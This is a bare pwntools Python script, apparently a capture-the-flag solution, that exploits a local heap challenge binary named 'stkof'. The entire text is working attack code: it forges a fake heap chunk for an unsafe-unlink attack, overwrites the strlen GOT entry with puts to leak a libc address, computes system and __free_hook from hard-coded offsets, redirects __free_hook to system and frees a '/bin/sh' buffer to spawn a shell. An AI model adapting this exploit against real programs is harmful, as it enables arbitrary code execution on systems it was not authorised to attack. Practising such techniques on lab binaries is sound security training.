from pwn import *
p = process("./stkof")
elf = ELF("./stkof")
def malloc(size):
p.sendline("1")
p.sendline(str(size))
print p.recvuntil('OK')
def free(index):
p.sendline("3")
p.sendline(str(index))
print p.recvuntil('OK')
def fread(index,length,data):
p.sendline("2")
p.sendline(str(index))
p.sendline(str(length))
p.sendline(data)
print p.recvuntil('OK')
def len_check(index):
p.sendline("4")
p.sendline(str(index))
p.recv(1024) #enter input
pointer = 0x602150
malloc(0x80)
malloc(0x80)
malloc(0x80)
malloc(0x80)
malloc(0x80)
payload = p64(0)
payload += p64(0x81)
payload += p64(pointer-0x18)
payload += p64(pointer-0x10)
payload += "A"*0x60
payload += p64(0x80)
payload += p64(0x90)
fread(2,len(payload),payload)
free(3)
payload = p64(0)*2
payload += p64(elf.got['strlen'])
fread(2,len(payload),payload)
fread(1,8,p64(elf.plt['puts']))
malloc(0x100)
malloc(0x100)
free(6)
malloc(0x99)
len_check(8)
main_arena = u64(p.recv(6)+"\x00\x00") - 344
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - 0x3c4b10
system = libc_base + 0x45390
free_hook = libc_base + 0x3c67a8
print hex(malloc_hook)
print hex(libc_base)
print hex(system)
payload = p64(0)*2
payload += p64(free_hook)
fread(2,len(payload),payload)
fread(1,8,p64(system))
malloc(0x105)
BinSH = "/bin/sh\x00"
fread(9,len(BinSH)+1,BinSH)
free(9)
p.interactive()